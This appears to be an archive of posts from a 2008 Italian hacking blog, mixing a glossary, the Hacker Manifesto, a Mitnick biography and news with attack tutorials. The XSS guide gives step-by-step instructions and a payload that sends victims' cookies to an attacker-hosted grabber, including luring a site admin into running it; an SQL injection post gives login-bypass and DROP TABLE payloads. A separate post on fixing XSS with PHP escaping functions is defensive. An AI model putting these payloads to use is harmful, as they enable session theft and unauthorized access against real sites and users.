Girando per il web ho trovato un sito interessante che espone il download di alcuni temi per il sistema operativo Windows XP
http://www.crystalxp.net/galerie/en.cat.3.htm
Spero vi sia utile!
Prolungare la durata dei trial all’infinito
Pubblicato su Hacking il Aprile 26, 2008 da WhackerSul blog di Kacker1one ho trovato un utile programma che prolunga la scadenza del trial ecco un immagine:
Il programma è compatibile solo e soltanto con versioni a 32Bit di Windows 2000, XP, Server 2003 e Vista. Non è compatibile con nessun’altro sistema operativo. Download: http://www.nirsoft….s_date.html
Tecniche di infiltrazione
Pubblicato su Hacking il Aprile 26, 2008 da Whacker
Oggi vi parlerò delle tecniche di infiltrazione che si sono sviluppate ed evolute con il passare del tempo all’interno del nostro amatissimo mondo digitale.
Fin dagli anni 70-80 in cui nacque per la prima volta la rete internet si sono verificati attacchi di intrusione all’interno di reti protette come ad esempio: reti bancarie o reti governative, con il passare degli anni tale tecnica si affinata, migliorata ed evoluta.
Social Engineering
Oggi vi parlerò di una tecnica molto usata da gente come lamerozzi, niubbi per fregare le così desiderate e amate password personali, sto parlando del “Social Engineering” o meglio ingegneria sociale tecnica usata per far credere di essere qualcun altro allo scopo di ottenere qualcosa, questa tecnica non è una vera è propria tecnica di intrusione ma porta gli stessi risultati.
Ora che abbiamo assodato di che cosa si tratta passiamo a vedere come si agisce, le regole sono semplici:
- dovete agire “professionalmente” ed essere credibili;
- dovete informarvi sull’argomento che state per affrontare
e in modo tale da sapersi muovere con facilità;
- dovete essere sicuri di voi stessi e di quello che dite o scrivete;
Insomma il social è l’unica “tecnica” che se usata in modo impeccabile non fallisce mai e non diventa obsoleta con il passare del tempo.
Passiamo ora alla pratica…quanti di voi hanno ricevuto una mail da parte di un operatore o meglio Web Master del nostro adorato sito “msn” che sosteneva che per problemi tecnici dovuti al sovraffollamento dei loro server avevano perso i vostri dati personali come nome, cognome, data di nascita, LA VOSTRA PASSWORD xd…bè questa è una tecnica di social, sicuramente molti di voi ci saranno cascati e avranno inviato i propri dati personali presso la casella e-mail di questo Web Master subendo di conseguenza un bell’OWN……
Sql injection
L’ SQL injection, è una tecnica infiltrazione che poco tempo fa era usata molto frequentemente in quanto molti dei siti scritti in php ne erano vulnerabili, tale tecnicha non è altro che un’iniezione di query SQL in una form, di solito poco controllata, per modificare la normale disposizione dei dati in un database.
Le conseguenze prodotte da questa vulnerabilità (ormai possiamo considerarla ex vulnerabilità) sono imprevedibili per il programmatore: l’Sql Injection permette al malintenzionato di autenticarsi all’interno del sito con privilegi da amministratore dandogli la possibilità di modificare qualsiasi cosa desideri.
Possiamo distinguere due tipi di attacchi di SQL injection, di tipo GET e di tipo POST
METODO POST
Questo primo metodo viene utilizzata soprattutto nelle schermate di login dei siti (rigorosamente in php o anche in asp altrimenti non fungerà mai), dove all’interno dei campi username e password andremo ad inserire la seguente sintassi:
Username: ‘ OR ‘’=’
Password: ‘ OR ‘’=’
L’azione all’interno del database sarà la seguente:
SELECT *
FROM utenti
WHERE nome = ‘ ‘ OR ‘ ‘=’ ‘ AND password = ‘ ‘ OR ‘ ‘=’ ‘
L’effetto sarà l’autoidentficazione con il primo record del database che nella maggior parte dei casi risulta quello dell’admin
METODO GET
Questo metodo e di un grado di difficoltà superiore rispetto al primo anche se riguarda sempre iniezione di codice, mentre nel precedente ci bastava andare nella pagina del login e inserire i dati, nel metodo get dovermmo soffermarci sul sul risultato prodotto sulla barra degli indirizzi da parte del sito in modo tale che sia riportata questa stringa:
www.ilsitovittima.it/nuke/index.php?&TopSearch=10
poiché stiamo parlando di pagine web dinamiche (php per intenderci) in tale codice viene contenuto un comando che servirà ad interrogare il database per andare a reperire il dato che avrà come id=10, ma cosa succederebbe se riuscissimo a manipolare tale codice al fine di voler cancellare la tabella avente come id=10 dal database?
SELECT ciao_mondo (in questo caso ciao mondo è la tabella che si trova nella posizione numero 10)
FROM utenti
WHERE id=10’; DROP table articoli –‘
utilizzando questa semplice query riusciremo ad eliminare la tabella avente come posizione 10
L’unica possibilità di protezione, è un controllo sui dati ricevuti da parte del programmatore, durante lo sviluppo del programma. Bisogna cioè assicurarsi che l’input ricevuto rispetti le regole necessarie.
By £ion
Guida alle xss grabbanti
Pubblicato su Hacking il Aprile 26, 2008 da Whacker1) Hostate su un qualsiasi sito di vostra proprietà (per esempio altervista) un cookie grabber
2) Trovare un sito vulnerabile alle xss
3) Verificare se quando al posto di questo codice <script>alert(”quellochevuoi”)</script> (codice per fare una xss) mettete questo <script>alert(document.cookie)</script> esce un’alert con tutti dei numeri (quei numeri sarebbero i vostri cookie in quel sito)
4) Dopo aver verificato ciò cambiate la stringa in questo modo <script>document.location=”link_del_hosting/documents.php?c=”+document.cookie;</script>
5) A questo punto avete due possibilità se potete fare l’xss attraverso il link del sito potete dare direttamente alla vittima o all’admin del sito vulnerabile il link con il codice sopra indicato.Se invece non potete lavorare sul link dovrete dare il codice sopra indicato alla vittima o all’admin e farglielo inserire nella parte vulnerabile del sito come per esempio la barra delle ricerche
6) Appena la vittima aprirà il link o inserirà il codice i suoi cookie arriveranno a voi.
QUESTA GUIDA è SOLAMENTE A SCOPO PURAMENTE INFORMATIVO IO NON MI ASSUMO NESSUNA RESPONSABILITà SULL’USO CHE NE FATE
Se la copiate siete pregati di specificare la fonte
Guida By Whacker
3 giorni su internet e muore…
Pubblicato su News il Aprile 26, 2008 da Whacker
PECHINO (CINA) – Deceduto a causa della sua passione. Un giovane è morto dopo una maratona di tre giorni di giochi online in un cybercafè di Guangzhou, nella Cina meridionale. Stroncato dal troppo web: questa sembrerebbe l’ipotesi più probabile secondo i giornali locali che hanno riportato la notizia.
LA VICENDA – L’uomo, trent’anni, si è sentito male sabato scorso, dopo aver passato 72 ore consecutive su Internet. Trasportato in ospedale, non è riuscito a superare la crisi. Il personale medico ha confermato che il troppo tempo trascorso su Internet potrebbe avergli causato problemi cardiaci. Non si conosce, al momento, quale sia il gioco online che ha tenuto il giovane incollato allo schermo fino all’esito fatale. Attualmente, gli internauti in Cina sono circa 163 milioni. La web-dipendenza, diffusa soprattutto tra i ragazzi, è una delle maggiori preoccupazioni del governo, che ha cercato di correre ai ripari con una serie di provvedimenti ad hoc. L’apertura di nuovi cybercafè è stata vietata e sono stati imposti limiti di tempo ai giochi online. Veri e propri centri di disintossicazione, inoltre, sono sorti per aiutare i drogati della rete a liberarsi dalla propria dipendenza. Ad aprile, infine, il presidente Hu Jintao ha lanciato una campagna per la purificazione della Rete. Obiettivo: eliminare i contenuti immorali che circolano sul web. Un repulisti che non ha colpito solo il materiale pornografico online, ma anche i siti politicamente scorretti, ovvero quelli che non diffondono i valori del Partito comunista.
LA VICENDA – L’uomo, trent’anni, si è sentito male sabato scorso, dopo aver passato 72 ore consecutive su Internet. Trasportato in ospedale, non è riuscito a superare la crisi. Il personale medico ha confermato che il troppo tempo trascorso su Internet potrebbe avergli causato problemi cardiaci. Non si conosce, al momento, quale sia il gioco online che ha tenuto il giovane incollato allo schermo fino all’esito fatale. Attualmente, gli internauti in Cina sono circa 163 milioni. La web-dipendenza, diffusa soprattutto tra i ragazzi, è una delle maggiori preoccupazioni del governo, che ha cercato di correre ai ripari con una serie di provvedimenti ad hoc. L’apertura di nuovi cybercafè è stata vietata e sono stati imposti limiti di tempo ai giochi online. Veri e propri centri di disintossicazione, inoltre, sono sorti per aiutare i drogati della rete a liberarsi dalla propria dipendenza. Ad aprile, infine, il presidente Hu Jintao ha lanciato una campagna per la purificazione della Rete. Obiettivo: eliminare i contenuti immorali che circolano sul web. Un repulisti che non ha colpito solo il materiale pornografico online, ma anche i siti politicamente scorretti, ovvero quelli che non diffondono i valori del Partito comunista.
I vocaboli dell’hacking
Pubblicato su Hacking il Aprile 26, 2008 da Whacker
I VOCABOLI HACKER !!!!!
HACKER
Il termine ‘hacker’ viene dall’ inglese ‘to hack’ che significa fare a pezzi, tagliare, spaccare in due, e addirittura dare calci nello stomaco all’avversario. Una ulteriore curiosità è che la parola ‘pirata’ (e quindi anche pirata informatico), può essere tradotta in inglese come ‘hijacker’ o ‘highjacker’… che contratta diventa proprio HACKER, pirata informatico.Chi è dunque il pirata informatico: l’hacker è colui che, attraverso l’uso del computer, entra e si impossessa del computer o del sistema altrui.
L’ HACKER E’ UNA PERSONA INTELLIGENTE, CON CONOSCENZA SUPERIORE DELL’USO DEL COMPUTER, PROGRAMMATORE ATTENTO ALLE NOVITA’, AMANTE DEL WEB, CAPACE DI METTERE IN CRISI I SISTEMI DI SOCIETA’ E ORGANIZZAZIONI SUPERIORI.
CRACKER
Nel tempo si sono create sfumature diverse, termini più precisi come ‘cracker’ definito come colui che danneggia irrimediabilmente (da ‘to crack’: danneggiare, distruggere ), a differenza dell’hacker che gioca limitandosi a dimostrare la sua superiorità a livello di conoscenze nell’uso del pc.
Non si può però definire pirata chi si diverte ad esempio a giocare nelle chat facendo ‘cadere’ gli utenti di una comunità, o chi diffonde programmini semplici semplici rinominati da sembrare foto o chi si limita ad usare programmi di altri per fare lievi danni più fastidiosi che reali.
LAMER
Il termine LAME o TO LAME trova la sua traduzione dall’inglese con la parola ZOPPO. Nel linguaggio degli hackers il lamer è colui che si serve di programmi altrui per fare danni ad un sistema ; il termine viene usato con disprezzo indicando quindi coloro che poco sanno di programmazione, ma che si limitano semplicemente ad inviare virus o trojans ad esempio.
Tutti iniziamo il nostro itinerario da hacker iniziando in questo modo.. non sentiamoci offesi.. Ma stanno lamer che se ti incontrano in chat ti chiedono ” come faccio ad entrare nel computer del mio amico per cancellargli tutto?” In Genere fra i VERI hackers sono fra i più odiati.
WANNABE
Chiara la traduzione dall’inglese per questo termine.. Appartengono alla categoria dei WANNABE tutti coloro che si spacciano per pirati, per grandi conoscitori.. solo perche’ vorrebbero esserlo…
LOOKER
il guardone, colui che viola i sistemi per pura curiosità;
MALICIOUS
Malicious Intruder: l’intruso doloso, viola i sistemi per il gusto di
provocare danni;
PROF-THIEF
il ladro professionista, ruba informazioni per guadagno;
si fa assumere dalla ditta prescelta per poi ricattarla o
derubarla;
HACKTIVISM
il crimine digitale compiuto per ragioni politiche;
CRACKDOWN
un giro di vite contro gli hacker da parte del governo.
Fonte: DR. ToD
Guida su come fixare le xss
Pubblicato su Hacking il Aprile 26, 2008 da Whacker
Per fixare il problema delle xss dobbiamo usare una delle 2 funzioni di php.
Querste funzioni non fanno altro che ripulire il codice HTML, ovvero i tag, per non far si’ che questi vengano iniettati nel codice.
La funzione piu’ utilizzata è htmlspecialchars() che tramuta tutti i caratteri < e > in < e >
Un’altra opzione è htmlentities() che sostituisce tutti i caratteri nelle corrispondenti entita’.
<?
// questa pagina mostra un esempio
// delle differenze di output tra le 2 funzioni
$input = ‘<script>alert(1);</script>’;
echo htmlspecialchars($input) . ‘<br />’;
echo htmlentities($input);
?>
Un esempio di htmlentities()
<?php
$str = “A ‘quote’ is <b>bold</b>”;
echo htmlentities($str);
echo htmlentities($str, ENT_QUOTES);
?>
Il primo visualizzera’ –> A ‘quote’ is <b>bold</b>
Il secondo –> A ‘quote’ is <b>bold</b>
Esempio di uso di htmlspecialchars()
<?php
$new = htmlspecialchars(”<a href=’test’>Test</a>”, ENT_QUOTES);
echo $new;
?>
Questo visualizzera’ –> <a href=’test’>Test</a>
La funzione strip_tags(), invece, elimina tutti gli elementi html, tranne alcuni elementi consentiti che bisogno specificare come ad esempio <i>, <b> o <p>.
Esempio di uso di strip_tags()
<?php
$text = ‘<p>Test paragraph.</p><!– Comment –> Other text’;
echo strip_tags($text);
echo “\n”;
// allow <p>
echo strip_tags($text, ‘<p>’);
?>
Ora che sappiamo per lo meno che esistono queste funzioni gia’ belle e pronte dobbiamo andarle ad applicare nel codice quando troviamo una xss sulla nostra web application.
Recentemente ho trovato una xss sul mio sito in una sezione dei video di GoogleBig che altro non e’ che un plugin di Mybb, vi posto una porzione di codice per rendere l’idea di come ho dovuto applicare la funzione per far si’ che nella ricerca dei video venissero filtrati i tag html.
Troviamo prima di tutto la pagina in questione: search.php
Ora andiamoci a cercare la porzione di codice che rende disponibile la ricerca, la query e l’output del risultato della query:
function search($query, $page)
{
global $db, $bgcolor2, $bgcolor4, $sitename, $io_db, $module_url, $list_page_items, $hm_index;
$option = trim($option);
$query = trim($query);
$query = FixQuotes(nl2br(filter_text($query)));
$db->escape_string($query);
$db->escape_string($option);
alpha_search($query);
…
In questo caso la variabile che passa i valori è $query quindi andiamo ad applicare la funzione htmlentities():
$query = FixQuotes(nl2br(filter_text(htmlentities($query))));
Autore: Langy
Mentor…
Pubblicato su Hacking il Aprile 26, 2008 da Whacker
Ne e’ stato arrestato un altro oggi, e’ su tutti i giornali.
“Ragazzo arrestato per crimine informatico”, “Hacker arrestato dopo essersi infiltrato in una banca”…
Dannati ragazzini. Sono tutti uguali. Ma avete mai, con la vostra psicologia da due soldi e il vostro tecno-cervello da anni 50, guardato dietro agli occhi del Hacker? Non vi siete mai chiesti cosa abbia fatto nascere la sua passione? Quale forza lo abbia creato, cosa puo’ averlo forgiato? Io sono un hacker, entrate nel mio mondo…
Il mio e’ un mondo che inizia con la scuola… Sono piu’ sveglio di molti altri ragazzi, quello che ci insegnano mi annoia…
Dannato sottosviluppato. Sono tutti uguali. Io sono alle Junior High, o alla High School. Ho ascoltato gli insegnanti spiegare per quindici volte come ridurre una frazione. L’ho capito. “No, Ms. Smith, io non mostro il mio lavoro. E’ tutto nella mia testa…”
Dannato bambino. Probabilmente lo ha copiato. Sono tutti uguali. Ho fatto una scoperta oggi. Ho trovato un computer. Aspetta un momento, questo e’ incredibile! Fa esattamente quello che voglio.
Se commetto un errore, e’ perche’ io ho sbagliato, non perche’ io non gli piaccio… O perche’ si senta minacciato da me… O perche’ pensi che io sia un coglione… O perche’ non gli piace insegnare e vorrebbe essere da un’altra parte… Dannato bambino. Tutto quello che fa e’ giocare. Sono tutti uguali.
Poi e’ successa una cosa…una porta si e’ aperta su un mondo…correndo attraverso le linee telefoniche come l’eroina nelle vene del tossicomane, un impulso elettronico e’ stato spedito, un rifugio dagli incompetenti di ogni giorno e’ stato trovato, una tastiera e’ stata scoperta.
“Questo e’…questo e’ il luogo a cui appartengo…” Io conosco tutti qui…non ci siamo mai incontrati, non abbiamo mai parlato faccia a faccia, non ho mai ascoltato le loro voci…pero’ conosco tutti.
Dannato bambino. Si e’ allacciato nuovamente alla linea telefonica. Sono tutti uguali. Ci potete scommettere il culo che siamo tutti uguali…noi siamo stati nutriti con cibo da bambini alla scuola mentre bramavamo una bistecca… i pezzi di cibo che ci avete dato erano gia stati masticati e senza sapore. Noi siamo stati dominati da sadici o ignorati dagli indifferenti. I pochi che avevano qualcosa da insegnarci trovavano in noi volenterosi allievi, ma queste persone sono come gocce d’acqua nel deserto.
Ora e’ questo il nostro mondo…il mondo dell’elettrone e dello switch, la bellezza del baud. Noi facciamo uso di un servizio gia esistente che non costerebbe nulla se non fosse controllato da approfittatori ingordi, e voi ci chiamate criminali. Noi esploriamo…e ci chiamate criminali. Noi cerchiamo conoscenza…e ci chiamate criminali. Noi esistiamo senza colore di pelle, nazionalita’, credi religiosi e ci chiamate criminali. Voi costruite bombe atomiche, finanziate guerre, uccidete, ingannate e mentite e cercate di farci credere che lo fate per il nostro bene, e poi siamo noi i criminali.
Si, io sono un criminale. Il mio crimine e’ la mia curiosita’. Il mio crimine e’ quello che i giurati pensano e sanno non quello che guardano. Il mio crimine e’ quello di scovare qualche vostro segreto, qualcosa che non vi fara’ mai dimenticare il mio nome.
Io sono un hacker e questo e’ il mio manifesto. Potete anche fermare me, ma non potete fermarci tutti…dopo tutto, siamo tutti uguali.
The Mentor era (e’) uno degli hacker piu’ famosi al mondo, e’ stato
arrestato negli anni 80 (in USA e dove se no…) e queste sono state
le sue ultime parole… Oggi non gli e’ piu’ concesso di usare ne’ un
computer ne’ alcun apparecchio telefonico (oltre i modem). E, come dice
lui, qual era il suo crimine?
The MenTor
Fonte: http://www.redskull92.wordpress.com
Kevin David Mitnick un grande…
Pubblicato su Hacking il Aprile 26, 2008 da Whacker
La storia infinita di Kevin David Mitnick, l’hacker più famoso del mondo, sotto processo negli Stati Uniti. E’ in carcere da quattro anni e gli è stata respinta ogni richiesta di libertà su cauzione.
1. This is the End…my only friend, the End…
E’ il 14 febbraio del 1995, giorno di San Valentino. In una cittadina americana sta accadendo qualcosa che scatenerà ribellioni, dimostrazioni, appelli via rete, la nascita di siti spontanei di contro-informazione, la creazione di una colletta per realizzare un fondo spese legali…
Arriva un camioncino blu, un Van, con la scritta Sprint Telecomunications. Dal Van esce un
giapponese, due tecnici della Sprint, le forze speciali dell’FBI con giubbotti antiproiettile ed armi alla mano. Sembra di vedere un film di azione. Ma non è così. A Raleigh, piccolo centro nello Stato del North Carolina, stanno per arrestare Kevin Mitnick.Le conseguenze di questo arresto saranno molteplici e non solo per le comunità underground ed hacker..
Iniziata nel 1981 con l’attacco da parte di Kevin, allora diciassettenne, ai sistemi Cosmos della Pacific Bell (compagnia telefonica americana), la “caccia all’uomo” dell’FBI si conclude nel 1995, dopo 14 anni. Centosessantotto mesi di appostamenti, intercettazioni, false piste, arresti mancati.
Il 14 febbraio si arriva alla conclusione di una lunga corsa, un inseguimento interminabile attraverso le reti di mezzo mondo. Quel giorno nasce il mito di Kevin Mitnick, l’hacker più famoso al mondo.
2. Gli inizi
Kevin nasce in California. I suoi genitori divorziano quando lui ha appena 3 anni. Nella sua adolescenza rispecchia lo stereotipo classico dell’hacker: a 13 anni è un ragazzino solitario, grassotello. Inizia con i “CB”, a 8 anni è già radioamatore. Da ex-hacker,
interpreto questa sua passione come una ricerca comunicativa: là fuori c’è qualcuno e lui ci vuole parlare, la distanza fisica non è più importante, a otto anni può dialogare con degli adulti che si trovano in altre città. Credo che in quel periodo sia nata in lui, forse
inconsciamente, la passione per l’hacking, le reti, la comunicazione.
Nella più classica immagine americana della prima metà degli anni ‘70, il ragazzino brufoloso, occhialuto e ciccione ha 9 anni e vagabonda per i negozi di elettronica della sua città, prende pezzi usati, li ricicla, costruisce, assembla tecnologia trasmissiva tutto
solo nella sua stanzetta, mentre i coetanei giocano a basket o “simply, they are hangin’ on around the school” (cazzeggiano davanti alla scuola): diventa cliente assiduo di alcuni negozi, fa amicizia con i proprietari, forse inizia a fare qualche lavoretto da bravo
teen-ager americano, ricevendo come paga dell’hardware usato.
Il ragazzino cresce, scopre i PC. Va oltre, fin da subito, scoprendo i modem: a 13 anni viene cacciato da scuola dal preside, perché entrava negli archivi degli altri istituti. Trasferisce la bolletta telefonica di un ospedale (30.000 US$) sul conto di uno che detestava.
Si battezza Condor, dal film “I tre giorni del Condor”, con Robert Redford. Credo che un alias, un nickname, non sia mai stato più azzeccato: il Condor è solitario, lavora da solo, non si fida di nessuno, vive con la solitudine. E probabilmente Kevin/Condor trova
nella Rete e nell’hacking una compagna ideale, un qualcosa che lo rende meno solo.
Verso la fine degli anni ‘70, a 16 anni, come ogni bravo ragazzo americano, prende la patente: la targa della sua auto è X-HACKER. A 17 anni viene arrestato per la prima volta: furto di manuali informatici. Immagino Kevin, andatura insicura, occhiali da vista spessi,
andare a cercare manuali per imparare, per capire dei sistemi informatici ai quali non poteva accedere, a cercare l’informazione. Io facevo trashing (letteralmente, rovistare nella spazzatura; farlo davanti alle sedi di aziende di informatica, università e compagnie di
telecomunicazione produce spesso informazioni molto riservate), per trovare i manuali della Digital e imparare a programmare su VAX/VMS.
Seguono altri arresti, nell’83, nell’87 e nell’88, sempre per reati informatici. Un giudice di Los Angeles, la signora Mariana Pfaelzer, lo mette in carcere emettendo una condanna superiore a quella richiesta dal D.A (District Attorney, il Pubblico Ministero). Prima di
farlo uscire dall’aula, gli dice: “Questa è l’ultima volta che fa una cosa simile, signor Mitnick”. Indubbiamente una frase profetica. Viene successivamente rilasciato, ma gli viene imposto il divieto di svolgere lavori che richiedano l’uso di un personal computer.
Oggi, nel 1999, ad alcuni anni di distanza, quello stesso giudice dovrà decidere se le richieste di risarcimento – presentate da multinazionali informatiche e pari ad un totale di ben ottanta milioni di dollari (sì, avete letto bene: hanno chiesto 80.000.000 US$ di
danni al Signor Kevin David Mitnick) – dovranno essere soddisfatte o meno. Buona fortuna, giudice Mariana.
Le aziende che hanno richiesto il risarcimento sono la Motorola, la Fujitsu, la Nokia, La Sun Microsystems, la Novell, la Nec. Il solo utile netto della Motorola nel 1995 è stato di 22.247.000.000 di dollari.
Con che coraggio queste aziende chiedono ottanta milioni di dollari ad un carcerato sotto processo, il quale non ha fatto altro che copiare delle informazioni per propria cultura personale, senza rivenderle, modificarle o distruggerle?
3. Il “Condor” vola troppo in alto Anni ‘90. Kevin è cresciuto. E’ sempre più Condor. E’ un fantasma, come scrissero in seguito. Non esiste. Vive dirottando i propri conti su altre utenze. Gira gli States, notebook e cellulare modificato. Pone molta attenzione durante le connessioni, cambia spesso numeri telefonici, appartamento. Si sposta di continuo. Esplode, probabilmente, il suo odio verso le “Big Companies”: IBM, Digital, Sun Microsystems, Fujitsu. Tutte hanno dei segreti da custodire. Il Condor cerca la libertà d’informazione. Vuole la verità, vuole i bug, i famosi difetti, errori di programmazione compiuti dalle software house, per poter accedere ai sistemi informatici protetti.
Dalla prima metà degli anni ‘90, sino al suo arresto, Kevin cresce ancora. E’ molto attirato dai sistemi VAX della Digital: sono i soli a non avere praticamente bug, a non essere “sfondabili”. Allora il Condor agisce, silenzioso. Utilizza Social Engineering, una tecnica
hacking per carpire telefonicamente informazioni spacciandosi per un’altra persona, un collega di una filiale. Ottiene tutto quello che vuole. Viola il sistema di un Internet Provider inglese. A quel sistema è abbonato, come utente regolare, un consulente della Digital.
E’ stato tra i creatori del VMS, il sistema operativo proprietario dei VAX Digital, ed ora effettua consulenze alla Digital sulla sicurezza. I bug ci sono. Vengono scoperti da quest’uomo. E Kevin gli spia le e-mail. Apprende i segreti più segreti della Digital, il
suo intento era quello: se non posso ottenere le informazioni in un modo, le ottengo in un altro.
L’FBI è sui suoi passi. Lui lo sa. Spia le comunicazioni tra la sede centrale dell’FBI e gli agenti dislocati, i quali lo stanno cercando per mezza America. Non appena l’FBI dà l’ordine “ok, andate a prenderlo”, lui sparisce. Li prende in giro. Falsifica le comunicazioni.
E’ un’ombra sulla Rete, nessuno sa dove sia fisicamente.
Kevin nel frattempo è entrato ovunque: multinazionali, società d’informatica, agenzie governative. Entra e copia: progetti, piani, budget, business plan, contatti, consulenze esterne. Non vende nulla, non baratta, non cancella: apprende, impara, conosce. Per lui
la conoscenza è importante. Sa come funzionano le cose. Capisce che il nuovo business sta partendo: telecomunicazioni, telefonia cellulare, satellitare, pay-Tv. I bit avanzano, l’analogico scompare. Kevin lo sa. Forse inizia a capire il potere che ha in mano.
Lo capiscono anche altre persone. Kevin ha accesso ad informazioni riservatissime, e questo dà molto fastidio alle multinazionali. Le lobby USA si muovono, l’FBI lo inserisce ufficialmente tra i “Top Wanted”, come per i peggiori criminali.
L’Fbi ha capito, le multinazionali anche, le lobby hanno provveduto: mancano i mass-media. Come per magia, appare un articolo sulla prima pagina del New York Times, il 4 luglio 1994: racconta dell’esistenza del Condor. Kevin diventa un personaggio. Ma è
sempre più braccato. John Markoff, l’autore dell’articolo, fa di tutto per incontrarlo. Corrompe alcuni suoi “amici”, collabora con l’FBI
per incastrarlo.
4. Inizia la guerra: Davide e Golia
Nel dicembre del 1994, appare un messaggio sul computer di Tsutomu Shimomura, nippo-americano, super esperto di sicurezza, consulente del Governo USA.
Non c’è scritto molto, solo un “Found me: I am on the Net”. Trovami, sono sulla Rete, gli dice Kevin.
La sfida ha inizio. Per la prima volta, le armi sono diverse: è una caccia all’uomo on-line. Le maggiori compagnie di telecomunicazione americane collaborano con l’FBI. La Sprint Corporation fornisce manuali, schede, tecnici specializzati. Il Condor è braccato.
Kevin ha utilizzato, tra i primi al mondo, la tecnica dell’IP-spoofing, nel dicembre del 1994, per attaccare i server di Shimomura con sede a San Diego. Shimomura commenta questa tecnica ad una conferenza americana (CMAD), nel gennaio del 1995. Pare dunque
che inizi, sin da subito, lo sfruttamento del Condor, delle sue tecniche, della sua abilità, del suo stile stile e delle sue competenze.
Markoff scrive altri articoli, accusa Kevin, lo dipinge come il “criminale”. Kevin ama, come molti hacker, la stampa. Vuole dire la sua. Non accetta giudizi senza poter ribattere. Contatta Jonathan Littman. Arriva a chiamarlo tre volte al giorno. Forse, da questo
momento in poi, il Condor perde la sua freddezza, la sua lucidità, i suoi attenti calcoli. Compie degli errori. Deve cambiare città sempre più spesso. Non capisce le motivazioni di tanto clamore attorno al suo caso. Discute con il giornalista “buono” di hacking, di
politica, di tecnologia, di donne, di costume. Littman lo definirà “una mente esplosiva, incontrollabile, incredibilmente potente”.
Littman sbaglia: come in ogni “grande rovina”, all’origine c’è un errore. Parla con Markoff, si confida. Gli rivela dove si trova Kevin. Lo rivela al collega giornalista, all’amico John. Markoff, il quale informa immediatamente Shimomura. Il cerchio si stringe. Kevin crede di
essere tranquillo. Ha fiducia nel suo confidente. Una volta un hacker mi disse: “Trust no 1: non fidarti mai di nessuno”. Kevin avrebbe dovuto incontrare quell’hacker, forse sarebbe andata diversamente. John Markoff o Shimomura – ma è indifferente – informano l’FBI.
Il Condor sta per cadere.
Torniamo al 14 febbraio del 1995. Kevin viene arrestato. Non uscirà mai più dal carcere. Amici, conoscenti, hacker, amanti della libertà d’espressione, dell’open source, della libera comunicazione, anarchici, hanno fondato un sito web, http://www.kevinmitnick.com.
Sull’home page c’è un contatore. Non è il classico counter per gli accessi. Scorre veloce, di continuo. Purtroppo non testimonia una cosa allegra, come l’alto numero di visitatori. Le cifre scorrono, a rotazione, e contano:
4 ANNI, 4 MESI, 22 GIORNI, 13 ORE, 8 MINUTI, 33 SECONDI…
4 ANNI, 4 MESI, 22 GIORNI, 13 ORE, 8 MINUTI, 34 SECONDI
4 ANNI, 4 MESI, 22 GIORNI, 13 ORE, 8 MINUTI, 35 SECONDI
La frase sopra recita:” Kevin Mitnick è stato imprigionato dal Governo Americano, prima della sentenza, da:…
5. Vola mio Condor, vola sempre più in alto.
Kevin Mitnick è la punta di un iceberg, a mio parere. E’ diventato il capro espiatorio. Gli Usa, le multinazionali, le aziende d’informatiche, vogliono una vittima. Un caso esemplare. Una condanna altrettanto esemplare. Vogliono un esempio, un precedente.
Negli Stati Uniti la detenzione media per omicidio colposo è di 3 anni: Kevin è dentro da 4; non ha ancora avuto un processo; il numero dei capi d’imputazione assegnatigli farebbe impallidire Al Capone; è stato messo in isolamento per otto mesi; ci sono migliaia di persone al mondo che lottano per i suoi ideali, ma lui non lo sa; gli è stata rifiutata ogni richiesta di libertà su cauzione;
gli furono sequestrati computer, modem, persino la radio: avrebbe potuto modificarla per comunicare con l’esterno, dissero.
L’amato Mr. Shimomura, insieme al degno compare Markoff (sembrano il gatto e la volpe), nel frattempo, hanno incassato un anticipo di 750.000 US$ per il libro che hanno scritto, “Sulle tracce di Kevin” (edizione Sperling & Kupfler). Recentemente hanno venduto i diritti per il film, e Kevin marcisce in una prigione americana, e continua a non sapere cosa gli succede intorno, cos’è diventato il Web – quelle “3 W” che tanto ci stanno cambiando la vita – che lui ha contribuito a rendere più sicuro.
Il ragazzo che voleva il “cyber-world” libero, gratuito ed accessibile a tutti, l’uomo che voleva dei sistemi sicuri, l’uomo che ha ispirato due generazione di hackers, guarda dalle sbarre i fili telefonici, immagina i segnali satellitari, le reti GSM a 1800 MHz che spingono i
segnali. Io telefono, e la “centrale” sa dove sono fisicamente, voi vi collegate al Web, e pagate la connessione, l’abbonamento, gli scatti, i megabytes scaricati. L’hacker che voleva l’informazione come un diritto innegabile dell’uomo, l’informazione gratuita, vera e
totale, il condor che voleva volare in alto, è stato rinchiuso, è stato ridotto al silenzio.
Non posso dire altro, a voi che leggete, se non farvi riflettere su una cosa: se i diritti costituzionali possono essere messi da parte nella Grande America per Kevin Mitnick, cosa vi fa pensare che non sarebbe lo stesso con voi al suo posto?
E non posso augurare altro, al buon Kevin Mitnick, se non di volare. Vola mio Condor, vola sempre più in alto.
Ora Kevin è stato rilasciato,lavora in una azienda come esperto di computer…
Autore: Raoul Chiesa
Il Keylogger che rubba le impronte digitali
Pubblicato su Hacking il Aprile 26, 2008 da Whacker
Che la biometria non sia la soluzione per tutti i problemi di sicurezza è dato per assodato; ormai non si contano i casi in cui un sistema di riconoscimento di dati biometrici sia stato ingannato. A volte, però, ci sono anche errori di progettazione che potrebbero essere evitati con un’ideazione più accurata.
Questo è quanto sostiene un ricercatore inglese, Matthew Lewis, il quale ha eseguito una dimostrazione su un lettore di impronte digitali alla scorsa Black Hat Conference in Amsterdam.
Il problema analizzato da Lewis, infatti, sta tra la scansione e l’invio della stessa ai server: se i dati inviati non sono crittografati, forse accedervi non sarà un gioco da ragazzi ma, con le dovute conoscenze, sicuramente possibile.
Infatti Lewis è riuscito a ricostruire l’immagine intercettando i dati che venivano inviati, usando la tecnica nota come man-in-the-middle: in pratica, il laptop del ricercatore si è interposto tra il lettore e il server, registrando il traffico di dati che scorreva dall’uno all’altro.
“Se un’immagine di buona qualità può essere ricostruita” – ha scritto l’autore nel rapporto – “è possibile che le tecniche descritte possano essere usate per generare un falso dito tridimensionale“.
Fonte: ZeusNews
